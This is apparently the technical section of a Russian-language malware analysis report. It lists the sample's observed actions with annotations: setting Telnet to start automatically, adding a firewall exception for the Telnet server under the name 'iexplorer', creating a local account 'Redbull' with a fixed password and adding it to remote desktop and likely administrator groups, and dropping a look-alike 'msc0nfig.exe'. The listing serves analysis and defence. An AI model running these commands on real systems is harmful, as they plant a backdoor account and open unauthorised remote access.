Техническая информация
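- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002' (значение 2 — автоматический запуск службы Telnet при загрузке системы)
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\netsh.exe firewall set allowedprogram <SYSTEM32>\tlntsvr.exe iexplorer enable (исключение брандмауэра Windows для сервера Telnet; запись в списке разрешённых программ названа «iexplorer»)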
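- <SYSTEM32>\net1.exe localgroup 'remote desktop users' Redbull /add
- <SYSTEM32>\net1.exe user Redbull 123456789 /add (создаётся локальная учётная запись «Redbull» с указанным паролем)
- <SYSTEM32>\net1.exe localgroup %USERNAME%s Redbull /add (вероятно, имеется в виду группа «Administrators»: похоже, что имя пользователя в отчёте автоматически заменено на переменную %USERNAME%)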
- <SYSTEM32>\MSWINSCK.OCX
- %TEMP%\aut3.tmp
- %TEMP%\aut2.tmp
- %TEMP%\aut1.tmp
- <SYSTEM32>\msc0nfig.exe (в имени файла цифра «0» вместо буквы «o»; имя похоже на системную утилиту msconfig.exe)
- %TEMP%\aut3.tmp
- %TEMP%\aut2.tmp
- %TEMP%\aut1.tmp
- ClassName: 'Shell_TrayWnd' WindowName: ''